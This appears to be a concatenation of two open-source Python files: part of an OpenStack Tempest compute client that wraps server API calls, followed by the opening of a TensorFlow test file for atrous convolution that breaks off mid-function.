{'min': '2.19', 'max': '2.25', 'schema': schemav219},
{'min': '2.26', 'max': '2.46', 'schema': schemav226},
{'min': '2.47', 'max': '2.47', 'schema': schemav247},
{'min': '2.48', 'max': '2.53', 'schema': schemav248},
{'min': '2.54', 'max': '2.56', 'schema': schemav254},
{'min': '2.57', 'max': '2.62', 'schema': schemav257},
{'min': '2.63', 'max': '2.69', 'schema': schemav263},
{'min': '2.70', 'max': '2.70', 'schema': schemav270},
{'min': '2.71', 'max': '2.72', 'schema': schemav271},
{'min': '2.73', 'max': None, 'schema': schemav273}]
def __init__(self, auth_provider, service, region,
enable_instance_password=True, **kwargs):
super(ServersClient, self).__init__(
auth_provider, service, region, **kwargs)
self.enable_instance_password = enable_instance_password
def create_server(self, **kwargs):
"""Create server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#create-server
:param name: Server name
:param imageRef: Image reference (UUID)
:param flavorRef: Flavor reference (UUID or full URL)
Most parameters except the following are passed to the API without
any changes.
:param disk_config: The name is changed to OS-DCF:diskConfig
:param scheduler_hints: The name is changed to os:scheduler_hints and
the parameter is set in the same level as the parameter 'server'.
"""
body = copy.deepcopy(kwargs)
if body.get('disk_config'):
body['OS-DCF:diskConfig'] = body.pop('disk_config')
hints = None
if body.get('scheduler_hints'):
hints = {'os:scheduler_hints': body.pop('scheduler_hints')}
post_body = {'server': body}
if hints:
post_body.update(hints)
post_body = json.dumps(post_body)
resp, body = self.post('servers', post_body)
body = json.loads(body)
# NOTE(maurosr): this deals with the case of multiple server create
# with return reservation id set True
if 'reservation_id' in body:
return rest_client.ResponseBody(resp, body)
if self.enable_instance_password:
create_schema = schema.create_server_with_admin_pass
else:
create_schema = schema.create_server
self.validate_response(create_schema, resp, body)
return rest_client.ResponseBody(resp, body)
def update_server(self, server_id, **kwargs):
"""Update server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#update-server
Most parameters except the following are passed to the API without
any changes.
:param disk_config: The name is changed to OS-DCF:diskConfig
"""
if 'disk_config' in kwargs:
kwargs['OS-DCF:diskConfig'] = kwargs.pop('disk_config')
post_body = json.dumps({'server': kwargs})
resp, body = self.put("servers/%s" % server_id, post_body)
body = json.loads(body)
schema = self.get_schema(self.schema_versions_info)
self.validate_response(schema.update_server, resp, body)
return rest_client.ResponseBody(resp, body)
def show_server(self, server_id):
"""Get server details.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#show-server-details
"""
resp, body = self.get("servers/%s" % server_id)
body = json.loads(body)
schema = self.get_schema(self.schema_versions_info)
self.validate_response(schema.get_server, resp, body)
return rest_client.ResponseBody(resp, body)
def delete_server(self, server_id):
"""Delete server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#delete-server
"""
resp, body = self.delete("servers/%s" % server_id)
self.validate_response(schema.delete_server, resp, body)
return rest_client.ResponseBody(resp, body)
def list_servers(self, detail=False, **params):
"""List servers.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#list-servers
https://docs.openstack.org/api-ref/compute/#list-servers-detailed
"""
url = 'servers'
schema = self.get_schema(self.schema_versions_info)
if detail:
url += '/detail'
_schema = schema.list_servers_detail
else:
_schema = schema.list_servers
if params:
url += '?%s' % urllib.urlencode(params)
resp, body = self.get(url)
body = json.loads(body)
self.validate_response(_schema, resp, body)
return rest_client.ResponseBody(resp, body)
def list_addresses(self, server_id):
"""Lists all addresses for a server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#list-ips
"""
resp, body = self.get("servers/%s/ips" % server_id)
body = json.loads(body)
self.validate_response(schema.list_addresses, resp, body)
return rest_client.ResponseBody(resp, body)
def list_addresses_by_network(self, server_id, network_id):
"""Lists all addresses of a specific network type for a server."""
resp, body = self.get("servers/%s/ips/%s" %
(server_id, network_id))
body = json.loads(body)
self.validate_response(schema.list_addresses_by_network, resp, body)
return rest_client.ResponseBody(resp, body)
def action(self, server_id, action_name,
schema=schema.server_actions_common_schema,
**kwargs):
if 'body' in kwargs:
post_body = json.dumps(kwargs['body'])
else:
post_body = json.dumps({action_name: kwargs})
resp, body = self.post('servers/%s/action' % server_id,
post_body)
if body:
body = json.loads(body)
else:
if isinstance(body, bytes):
body = body.decode('utf-8')
self.validate_response(schema, resp, body)
return rest_client.ResponseBody(resp, body)
def create_backup(self, server_id, **kwargs):
"""Backup a server instance.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#create-server-back-up-createbackup-action
"""
return self.action(server_id, "createBackup", **kwargs)
def change_password(self, server_id, **kwargs):
"""Change the root password for the server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#change-administrative-password-changepassword-action
"""
return self.action(server_id, 'changePassword', **kwargs)
def show_password(self, server_id):
resp, body = self.get("servers/%s/os-server-password" %
server_id)
body = json.loads(body)
self.validate_response(schema.show_password, resp, body)
return rest_client.ResponseBody(resp, body)
def delete_password(self, server_id):
"""Removes the encrypted server password from the metadata server
Note that this does not actually change the instance server
password.
"""
resp, body = self.delete("servers/%s/os-server-password" %
server_id)
self.validate_response(schema.server_actions_delete_password,
resp, body)
return rest_client.ResponseBody(resp, body)
def reboot_server(self, server_id, **kwargs):
"""Reboot a server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#reboot-server-reboot-action
"""
return self.action(server_id, 'reboot', **kwargs)
def rebuild_server(self, server_id, image_ref, **kwargs):
"""Rebuild a server with a new image.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#rebuild-server-rebuild-action
Most parameters except the following are passed to the API without
any changes.
:param disk_config: The name is changed to OS-DCF:diskConfig
"""
kwargs['imageRef'] = image_ref
if 'disk_config' in kwargs:
kwargs['OS-DCF:diskConfig'] = kwargs.pop('disk_config')
schema = self.get_schema(self.schema_versions_info)
if self.enable_instance_password:
rebuild_schema = schema.rebuild_server_with_admin_pass
else:
rebuild_schema = schema.rebuild_server
return self.action(server_id, 'rebuild',
rebuild_schema, **kwargs)
def resize_server(self, server_id, flavor_ref, **kwargs):
"""Change the flavor of a server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#resize-server-resize-action
Most parameters except the following are passed to the API without
any changes.
:param disk_config: The name is changed to OS-DCF:diskConfig
"""
kwargs['flavorRef'] = flavor_ref
if 'disk_config' in kwargs:
kwargs['OS-DCF:diskConfig'] = kwargs.pop('disk_config')
return self.action(server_id, 'resize', **kwargs)
def confirm_resize_server(self, server_id, **kwargs):
"""Confirm the flavor change for a server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#confirm-resized-server-confirmresize-action
"""
return self.action(server_id, 'confirmResize',
schema.server_actions_confirm_resize,
**kwargs)
def revert_resize_server(self, server_id, **kwargs):
"""Revert a server back to its original flavor.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#revert-resized-server-revertresize-action
"""
return self.action(server_id, 'revertResize', **kwargs)
def create_image(self, server_id, name, meta=None):
"""Creates an image of the original server."""
post_body = {
'createImage': {
'name': name,
}
}
if meta is not None:
post_body['createImage']['metadata'] = meta
post_body = json.dumps(post_body)
resp, body = self.post('servers/%s/action' % str(server_id),
post_body)
return resp, body
def list_server_metadata(self, server_id):
"""Lists all metadata for a server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#list-all-metadata
"""
resp, body = self.get("servers/%s/metadata" % server_id)
body = json.loads(body)
self.validate_response(schema.list_server_metadata, resp, body)
return rest_client.ResponseBody(resp, body)
def set_server_metadata(self, server_id, meta, no_metadata_field=False):
"""Sets one or more metadata items for a server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#replace-metadata-items
"""
if no_metadata_field:
post_body = ""
else:
post_body = json.dumps({'metadata': meta})
resp, body = self.put('servers/%s/metadata' % server_id,
post_body)
body = json.loads(body)
self.validate_response(schema.set_server_metadata, resp, body)
return rest_client.ResponseBody(resp, body)
def update_server_metadata(self, server_id, meta):
"""Updates one or more metadata items for a server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#create-or-update-metadata-items
"""
post_body = json.dumps({'metadata': meta})
resp, body = self.post('servers/%s/metadata' % server_id,
post_body)
body = json.loads(body)
self.validate_response(schema.update_server_metadata,
resp, body)
return rest_client.ResponseBody(resp, body)
def show_server_metadata_item(self, server_id, key):
"""Shows details for a metadata item, by key, for a server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#show-metadata-item-details
"""
resp, body = self.get("servers/%s/metadata/%s" % (server_id, key))
body = json.loads(body)
self.validate_response(schema.set_show_server_metadata_item,
resp, body)
return rest_client.ResponseBody(resp, body)
def set_server_metadata_item(self, server_id, key, meta):
"""Sets a metadata item, by key, for a server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#create-or-update-metadata-item
"""
post_body = json.dumps({'meta': meta})
resp, body = self.put('servers/%s/metadata/%s' % (server_id, key),
post_body)
body = json.loads(body)
self.validate_response(schema.set_show_server_metadata_item,
resp, body)
return rest_client.ResponseBody(resp, body)
def delete_server_metadata_item(self, server_id, key):
"""Deletes a metadata item, by key, from a server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#delete-metadata-item
"""
resp, body = self.delete("servers/%s/metadata/%s" %
(server_id, key))
self.validate_response(schema.delete_server_metadata_item,
resp, body)
return rest_client.ResponseBody(resp, body)
def stop_server(self, server_id, **kwargs):
"""Stops a running server and changes its status to SHUTOFF.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#stop-server-os-stop-action
"""
return self.action(server_id, 'os-stop', **kwargs)
def start_server(self, server_id, **kwargs):
"""Starts a stopped server and changes its status to ACTIVE.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#start-server-os-start-action
"""
return self.action(server_id, 'os-start', **kwargs)
def attach_volume(self, server_id, **kwargs):
"""Attaches a volume to a server instance.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#attach-a-volume-to-an-instance
"""
post_body = json.dumps({'volumeAttachment': kwargs})
resp, body = self.post('servers/%s/os-volume_attachments' % server_id,
post_body)
body = json.loads(body)
schema = self.get_schema(self.schema_versions_info)
self.validate_response(schema.attach_volume, resp, body)
return rest_client.ResponseBody(resp, body)
def update_attached_volume(self, server_id, attachment_id, **kwargs):
"""Swaps a volume attached to an instance for another volume
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#update-a-volume-attachment
"""
post_body = json.dumps({'volumeAttachment': kwargs})
resp, body = self.put('servers/%s/os-volume_attachments/%s' %
(server_id, attachment_id),
post_body)
self.validate_response(schema.update_attached_volume, resp, body)
return rest_client.ResponseBody(resp, body)
def detach_volume(self, server_id, volume_id): # noqa
"""Detaches a volume from a server instance.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#detach-a-volume-from-an-instance
"""
resp, body = self.delete('servers/%s/os-volume_attachments/%s' %
(server_id, volume_id))
self.validate_response(schema.detach_volume, resp, body)
return rest_client.ResponseBody(resp, body)
def show_volume_attachment(self, server_id, volume_id):
"""Return details about the given volume attachment.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#show-a-detail-of-a-volume-attachment
"""
resp, body = self.get('servers/%s/os-volume_attachments/%s' % (
server_id, volume_id))
body = json.loads(body)
schema = self.get_schema(self.schema_versions_info)
self.validate_response(schema.show_volume_attachment, resp, body)
return rest_client.ResponseBody(resp, body)
def list_volume_attachments(self, server_id):
"""Returns the list of volume attachments for a given instance.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#list-volume-attachments-for-an-instance
"""
resp, body = self.get('servers/%s/os-volume_attachments' % (
server_id))
body = json.loads(body)
schema = self.get_schema(self.schema_versions_info)
self.validate_response(schema.list_volume_attachments, resp, body)
return rest_client.ResponseBody(resp, body)
def add_security_group(self, server_id, **kwargs):
"""Add a security group to the server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#add-security-group-to-a-server-addsecuritygroup-action
"""
return self.action(server_id, 'addSecurityGroup', **kwargs)
def remove_security_group(self, server_id, **kwargs):
"""Remove a security group from the server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#remove-security-group-from-a-server-removesecuritygroup-action
"""
return self.action(server_id, 'removeSecurityGroup', **kwargs)
def live_migrate_server(self, server_id, **kwargs):
"""This should be called with administrator privileges.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#live-migrate-server-os-migratelive-action
"""
return self.action(server_id, 'os-migrateLive', **kwargs)
def migrate_server(self, server_id, **kwargs):
"""Migrate a server to a new host.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#migrate-server-migrate-action
"""
return self.action(server_id, 'migrate', **kwargs)
def lock_server(self, server_id, **kwargs):
"""Lock the given server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#lock-server-lock-action
"""
return self.action(server_id, 'lock', **kwargs)
def unlock_server(self, server_id, **kwargs):
"""UNlock the given server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#unlock-server-unlock-action
"""
return self.action(server_id, 'unlock', **kwargs)
def suspend_server(self, server_id, **kwargs):
"""Suspend the provided server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#suspend-server-suspend-action
"""
return self.action(server_id, 'suspend', **kwargs)
def resume_server(self, server_id, **kwargs):
"""Un-suspend the provided server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#resume-suspended-server-resume-action
"""
return self.action(server_id, 'resume', **kwargs)
def pause_server(self, server_id, **kwargs):
"""Pause the provided server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#pause-server-pause-action
"""
return self.action(server_id, 'pause', **kwargs)
def unpause_server(self, server_id, **kwargs):
"""Un-pause the provided server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#unpause-server-unpause-action
"""
return self.action(server_id, 'unpause', **kwargs)
def reset_state(self, server_id, **kwargs):
"""Reset the state of a server to active/error.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#reset-server-state-os-resetstate-action
"""
return self.action(server_id, 'os-resetState', **kwargs)
def shelve_server(self, server_id, **kwargs):
"""Shelve the provided server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#shelve-server-shelve-action
"""
return self.action(server_id, 'shelve', **kwargs)
def unshelve_server(self, server_id, **kwargs):
"""Un-shelve the provided server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#unshelve-restore-shelved-server-unshelve-action
"""
# NOTE(gmann): pass None as request body if nothing is requested.
# Nova started the request body check since 2.77 microversion and only
# accept AZ or None as valid req body and reject the empty dict {}.
# Before 2.77 microverison anything is valid body as Nova does not
# check the request body but as per api-ref None is valid request
# body to pass so we do not need to check the requested microversion
# here and always default req body to None.
if not kwargs:
kwargs['body'] = {'unshelve': None}
return self.action(server_id, 'unshelve', **kwargs)
def shelve_offload_server(self, server_id, **kwargs):
"""Shelve-offload the provided server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#shelf-offload-remove-server-shelveoffload-action
"""
return self.action(server_id, 'shelveOffload', **kwargs)
def get_console_output(self, server_id, **kwargs):
"""Get console output.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#show-console-output-os-getconsoleoutput-action
"""
return self.action(server_id, 'os-getConsoleOutput',
schema.get_console_output, **kwargs)
def get_remote_console(self, server_id, console_type, protocol, **kwargs):
"""Get a remote console.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#create-remote-console
"""
param = {
'remote_console': {
'type': console_type,
'protocol': protocol,
}
}
post_body = json.dumps(param)
resp, body = self.post("servers/%s/remote-consoles" % server_id,
post_body)
body = json.loads(body)
schema = self.get_schema(self.schema_versions_info)
self.validate_response(schema.get_remote_consoles, resp, body)
return rest_client.ResponseBody(resp, body)
def list_virtual_interfaces(self, server_id):
"""List the virtual interfaces used in an instance."""
resp, body = self.get('/'.join(['servers', server_id,
'os-virtual-interfaces']))
body = json.loads(body)
self.validate_response(schema.list_virtual_interfaces, resp, body)
return rest_client.ResponseBody(resp, body)
def rescue_server(self, server_id, **kwargs):
"""Rescue the provided server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#rescue-server-rescue-action
"""
if self.enable_instance_password:
rescue_schema = schema.rescue_server_with_admin_pass
else:
rescue_schema = schema.rescue_server
return self.action(server_id, 'rescue', rescue_schema, **kwargs)
def unrescue_server(self, server_id):
"""Unrescue the provided server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#unrescue-server-unrescue-action
"""
return self.action(server_id, 'unrescue')
def show_server_diagnostics(self, server_id):
"""Get the usage data for a server."""
resp, body = self.get("servers/%s/diagnostics" % server_id)
body = json.loads(body)
schema = self.get_schema(self.schema_versions_info)
self.validate_response(schema.show_server_diagnostics, resp, body)
return rest_client.ResponseBody(resp, body)
def list_instance_actions(self, server_id):
"""List the provided server action."""
resp, body = self.get("servers/%s/os-instance-actions" %
server_id)
body = json.loads(body)
self.validate_response(schema.list_instance_actions, resp, body)
return rest_client.ResponseBody(resp, body)
def show_instance_action(self, server_id, request_id):
"""Returns the action details of the provided server."""
resp, body = self.get("servers/%s/os-instance-actions/%s" %
(server_id, request_id))
body = json.loads(body)
self.validate_response(schema.show_instance_action, resp, body)
return rest_client.ResponseBody(resp, body)
def force_delete_server(self, server_id, **kwargs):
"""Force delete a server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#force-delete-server-forcedelete-action
"""
return self.action(server_id, 'forceDelete', **kwargs)
def restore_soft_deleted_server(self, server_id, **kwargs):
"""Restore a soft-deleted server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#restore-soft-deleted-instance-restore-action
"""
return self.action(server_id, 'restore', **kwargs)
def reset_network(self, server_id, **kwargs):
"""Reset the Network of a server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#reset-networking-on-a-server-resetnetwork-action
"""
return self.action(server_id, 'resetNetwork', **kwargs)
def inject_network_info(self, server_id, **kwargs):
"""Inject the Network Info into server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#inject-network-information-injectnetworkinfo-action
"""
return self.action(server_id, 'injectNetworkInfo', **kwargs)
def get_vnc_console(self, server_id, **kwargs):
"""Get URL of VNC console.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#get-vnc-console-os-getvncconsole-action-deprecated
"""
return self.action(server_id, "os-getVNCConsole",
schema.get_vnc_console, **kwargs)
def add_fixed_ip(self, server_id, **kwargs):
"""Add a fixed IP to server instance.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#add-associate-fixed-ip-addfixedip-action-deprecated
"""
return self.action(server_id, 'addFixedIp', **kwargs)
def remove_fixed_ip(self, server_id, **kwargs):
"""Remove input fixed IP from input server instance.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#remove-disassociate-fixed-ip-removefixedip-action-deprecated
"""
return self.action(server_id, 'removeFixedIp', **kwargs)
def list_security_groups_by_server(self, server_id):
"""Lists security groups for a server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#list-security-groups-by-server
"""
resp, body = self.get("servers/%s/os-security-groups" % server_id)
body = json.loads(body)
self.validate_response(security_groups_schema.list_security_groups,
resp, body)
return rest_client.ResponseBody(resp, body)
def list_tags(self, server_id):
"""Lists all tags for a server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#list-tags
"""
url = 'servers/%s/tags' % server_id
resp, body = self.get(url)
body = json.loads(body)
schema = self.get_schema(self.schema_versions_info)
self.validate_response(schema.list_tags, resp, body)
return rest_client.ResponseBody(resp, body)
def update_all_tags(self, server_id, tags):
"""Replaces all tags on specified server with the new set of tags.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#replace-tags
:param tags: List of tags to replace current server tags with.
"""
url = 'servers/%s/tags' % server_id
put_body = {'tags': tags}
resp, body = self.put(url, json.dumps(put_body))
body = json.loads(body)
schema = self.get_schema(self.schema_versions_info)
self.validate_response(schema.update_all_tags, resp, body)
return rest_client.ResponseBody(resp, body)
def delete_all_tags(self, server_id):
"""Deletes all tags from the specified server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#delete-all-tags
"""
url = 'servers/%s/tags' % server_id
resp, body = self.delete(url)
schema = self.get_schema(self.schema_versions_info)
self.validate_response(schema.delete_all_tags, resp, body)
return rest_client.ResponseBody(resp, body)
def check_tag_existence(self, server_id, tag):
"""Checks tag existence on the server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#check-tag-existence
:param tag: Check for existence of tag on specified server.
"""
url = 'servers/%s/tags/%s' % (server_id, tag)
resp, body = self.get(url)
schema = self.get_schema(self.schema_versions_info)
self.validate_response(schema.check_tag_existence, resp, body)
return rest_client.ResponseBody(resp, body)
def update_tag(self, server_id, tag):
"""Adds a single tag to the server if server has no specified tag.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#add-a-single-tag
:param tag: Tag to be added to the specified server.
"""
url = 'servers/%s/tags/%s' % (server_id, tag)
resp, body = self.put(url, None)
schema = self.get_schema(self.schema_versions_info)
self.validate_response(schema.update_tag, resp, body)
return rest_client.ResponseBody(resp, body)
def delete_tag(self, server_id, tag):
"""Deletes a single tag from the specified server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#delete-a-single-tag
:param tag: Tag to be removed from the specified server.
"""
url = 'servers/%s/tags/%s' % (server_id, tag)
resp, body = self.delete(url)
schema = self.get_schema(self.schema_versions_info)
self.validate_response(schema.delete_tag, resp, body)
return rest_client.ResponseBody(resp, body)
def evacuate_server(self, server_id, **kwargs):
"""Evacuate the given server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#evacuate-server-evacuate-action
"""
if self.enable_instance_password:
evacuate_schema = schema.evacuate_server_with_admin_pass
else:
evacuate_schema = schema.evacuate_server
return self.action(server_id, 'evacuate',
evacuate_schema,
**kwargs)
|
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for atrous convolution functionality in tensorflow.ops.nn."""
import contextlib
import numpy as np
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gradient_checker
from tensorflow.python.ops import nn_ops
import tensorflow.python.ops.nn_grad # pylint: disable=unused-import
from tensorflow.python.platform import test
def upsample_filters(filters, rate):
"""Upsamples the filters by a factor of rate along the spatial dimensions.
Args:
filters: spatial_shape + [in_channels, out_channels]
Original filters.
rate: A list of len(spatial_shape) positive ints, specifying the
upsampling rate.
Returns:
filters_up: output_spatial_shape + [in_channels, out_channels].
Upsampled filters with
output_spatial_shape[i] = (spatial_shape[i] - 1) * rate[i] + 1
containing (rate[i] - 1) zeros between consecutive filter values along
spatial dimension i.
"""
num_spatial_dims = len(rate)
spatial_shape = np.array(filters.shape[:num_spatial_dims])
output_spatial_shape = (spatial_shape - 1) * rate + 1
output = np.zeros(
tuple(output_spatial_shape) + tuple(filters.shape[-2:]), filters.dtype)
output[tuple(np.s_[::rate[i]] for i in range(num_spatial_dims))] = filters
return output
class AtrousConvolutionTest(test.TestCase):
@contextlib.contextmanager
def _delay_checks(self):
"""Context manager for combining checks depending on tensor evaluations.
Each call to Session.run has some overhead, and this overhead can easily
account for the majority of the time spent in tests that call Session.run
(or Tensor.eval) many times.
This context manager provides a mechanism for registering callback functions
and associated tensors. When the context is exited, all of the tensors
associated with all of the registrations are evaluated with a single call to
Session.run, and then each registered callback function is called with the
values of its associated tensors.
Yields:
A function `add_check(check, *args, **kwargs)` where `check` is the
callback function to be invoked, and `*args` and `**kwargs` specify the
associated Tensors. When in EAGER mode, check is executed in add_check,
otherwise, it's delayed after the context.
"""
checks = []
def add_check(check, *args, **kwargs):
if context.executing_eagerly():
args_val, kwargs_val = self.evaluate([args, kwargs])
check(*args_val, **kwargs_val)
else:
checks.append((check, args, kwargs))
yield add_check
if not context.executing_eagerly():
all_values = self.evaluate([[args, kwargs] for _, args, kwargs in checks])
for (check, _, _), (args, kwargs) in zip(checks, all_values):
check(*args, **kwargs)
def _test_atrous_convolution(self, add_check, input_shape, filter_shape,
dilation_rate, **kwargs):
filters = np.arange(
np.prod(filter_shape), dtype=np.float32).reshape(filter_shape)
filters_upsampled = upsample_filters(filters, dilation_rate)
x = np.arange(np.prod(input_shape), dtype=np.float32).reshape(input_shape)
y1 = nn_ops.convolution(
input=x, filter=filters, dilation_rate=dilation_rate, **kwargs)
y2 = nn_ops.convolution(input=x, filter=filters_upsampled, **kwargs)
def check(y1_eval, y2_eval):
self.assertAllClose(y1_eval, y2_eval, rtol=1e-2, atol=1e-2)
add_check(check, y1, y2)
@test_util.run_v1_only("b/120545219")
def test_unknown_spatial_dims_for_channel_last_format(self):
x = array_ops.placeholder(dtypes.float32, [1, None, None, 10])
w = array_ops.zeros([3, 3, 10, 20])
y = nn_ops.convolution(
x, w, "VALID", dilation_rate=[2, 2], data_format="NHWC")
self.assertEqual(y.shape.as_list(), [1, None, None, 20])
@test_util.run_v1_only("b/120545219")
def test_unknown_spatial_dims_for_channel_first_format(self):
x = array_ops.placeholder(dtypes.float32, [1, 10, None, None])
w = array_ops.zeros([3, 3, 10, 20])
y = nn_ops.convolution(
x, w, "VALID", dilation_rate=[2, 2], data_format="NCHW")
self.assertEqual(y.shape.as_list(), [1, 20, None, None])
@test_util.run_in_graph_and_eager_modes
def testAtrousConvolution2D(self):
with self._delay_checks() as add_check:
for padding in ["SAME", "VALID"]:
for height, width in [[9, 9], [9, 10]]:
for kernel_height, kernel_width in [[1, 1], [2, 2], [2, 3]]:
for dilation_rate in [[1, 1], [3, 2], [2, 1]]:
self._test_atrous_convolution(
add_check=add_check,
input_shape=[2, height, width, 2],
filter_shape=[kernel_height, kernel_width, 2, 2],
padding=padding,
dilation_rate=dilation_rate,
)
@test_util.run_in_graph_and_eager_modes
def testAtrousConvolution3D(self):
with self._delay_checks() as add_check:
for padding in ["SAME", "VALID"]:
for depth, height, width in [[9, 9, 10], [9, 10, 9]]:
for kernel_depth, kernel_height, kernel_width in [[3, 3,
3], [3, 2, 2],
[2, 1, 3]]:
for dilation_rate in [[1, 1, 1], [3, 3, 3], [3, 2, 3], [3, 1, 2]]:
self._test_atrous_convolution(
add_check=add_check,
input_shape=[2, depth, height, width, 2],
filter_shape=[
kernel_depth, kernel_height, kernel_width, 2, 2
],
padding=padding,
dilation_rate=dilation_rate,
)
@test_util.run_in_graph_and_eager_modes
def testAtrousConvolution1D(self):
with self._delay_checks() as add_check:
for padding in ["SAME", "VALID"]:
for width in [9, 10]:
for kernel_width in range(1, 4):
for rate in range(1, 4):
self._test_atrous_convolution(
add_check=add_check,
input_shape=[2, width, 2],
filter_shape=[kernel_width, 2, 2],
padding=padding,
dilation_rate=[rate],
)
@test_util.run_in_graph_and_eager_modes
def testAtrousConvolutionNC(self):
if test.is_gpu_available(cuda_only=True):
# "NCW" and "NCHW" formats are currently supported only on CUDA.
with test_util.device(use_gpu=True):
with self._delay_checks() as add_check:
for padding in ["SAME", "VALID"]:
self._test_atrous_convolution(
add_check=add_check,
input_shape=[2, 2, 9],
padding=padding,
filter_shape=[3, 2, 2],
dilation_rate=[2],
data_format="NCW",
)
self._test_atrous_convolution(
add_check=add_check,
input_shape=[2, 2, 9, 5],
padding=padding,
filter_shape=[3, 3, 2, 2],
dilation_rate=[2, 1],
data_format="NCHW",
)
@test_util.run_in_graph_and_eager_modes
def testAtrousSequence(self):
"""Tests optimization of sequence of atrous convolutions.
See the documentation of with_space_to_batch.
"""
with self._delay_checks() as add_check:
for padding in ["SAME", "VALID"]:
for height in range(15, 17):
for width in range(15, 17):
x_shape = [3, height, width, 2]
x = np.random.random_sample(x_shape).astype(np.float32)
kernel_sizes = [1, 3] if padding == "SAME" else range(1, 3)
for kernel in kernel_sizes:
f_shape = [kernel, kernel, 2, 2]
f1 = 1e-2 * np.random.random_sample(f_shape).astype(np.float32)
f2 = 1e-2 * np.random.random_sample(f_shape).astype(np.float32)
def combined_op(converted_input, num_spatial_dims, padding_arg): # pylint: disable=unused-argument
# pylint: disable=cell-var-from-loop
result = nn_ops.convolution(
